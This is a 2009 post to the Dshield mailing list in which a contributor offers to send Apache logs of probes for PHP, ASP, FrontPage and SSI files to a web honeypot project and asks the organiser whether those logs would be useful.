[Dshield] Web honeypot project
John Hardin
jhardin at impsec.org
Wed Feb 18 18:33:56 GMT 2009
On Tue, 17 Feb 2009, John Hardin wrote:
> On Tue, 17 Feb 2009, John Hardin wrote:
>
>> On Tue, 17 Feb 2009, Johannes B. Ullrich wrote:
>>
>>> If you filer too tightly, then you will only send us a biased view of
>>> the attacks you see. For example, I consider a script one of our
>>> handlers (Robert Danford) wrote which collects PHP file inclusion
>>> attempts. It works very well to identify malware URLs spreading via file
>>> inclusion, but it totally misses other attacks.
>>
>> There's a limit to the resources I can devote to a featureful honeypot,
>> and I don't run PHP on my production web server. What I was thinking was
>> shipping logs of any request for any .php file from my production server.
>> That I can do quite easily. Is that too filtered to be useful?
>
> ...and, of course, requests for any FrontPage cruft, or ASP, or ASP.NET,
> or any of the other SSI stuff I don't support.
Johannes, do you want apache logs for this stuff?
--
John Hardin KA7OHZ http://www.impsec.org/~jhardin/
jhardin at impsec.org FALaholic #11174 pgpk -a jhardin at impsec.org
key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
Look at the people at the top of both efforts. Linus Torvalds is a
university graduate with a CS degree. Bill Gates is a university
dropout who bragged about dumpster-diving and using other peoples'
garbage code as the basis for his code. Maybe that has something to
do with the difference in quality/security between Linux and
Windows. -- anytwofiveelevenis on Y! SCOX
-----------------------------------------------------------------------
4 days until George Washington's 277th Birthday
More information about the Dshield
mailing list